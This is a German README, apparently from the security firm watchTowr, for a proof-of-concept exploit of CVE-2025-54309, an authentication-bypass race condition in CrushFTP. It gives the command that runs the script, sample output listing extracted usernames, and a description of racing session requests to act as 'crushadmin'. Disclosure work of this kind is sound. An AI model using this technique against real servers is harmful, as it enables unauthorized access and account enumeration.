
Proof-of-Concept-Exploit für CVE-2025-54309, der eine Authentifizierungsumgehung mittels Race Condition in CrushFTP WebInterface demonstriert, um Benutzer aufzulisten.
Ein Proof of Concept zur Authentifizierungsumgehung von CrushFTP
Technische Details finden Sie in unserem Blogbeitrag
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-CrushFTP-CVE-2025-54309.py
(*) CrushFTP Authentication Bypass Race Condition PoC
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-54309]
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!
Dieses Skript ist ein Proof of Concept für CVE-2025-54309 gegen CrushFTP-Schnittstellen. Durch die Erstellung einer Reihe von Race-Anfragen, die dieselben Sitzungskennungen verwenden, einer Anfrage zum Setzen der Benutzernamenseigenschaft auf »crushadmin« und einer Anfrage zur Ausführung eines authentifizierten Befehls als dieser Benutzer, ist es in diesem PoC möglich, die Liste der Benutzernamen zu extrahieren. Weitere Details finden Sie in unserem [Blogbeitrag] (https://labs.watchtowr.com/).
Weitere Details im CrushFTP Advisory
Für die neuesten Sicherheitsforschungen folgen Sie dem watchTowr Labs-Team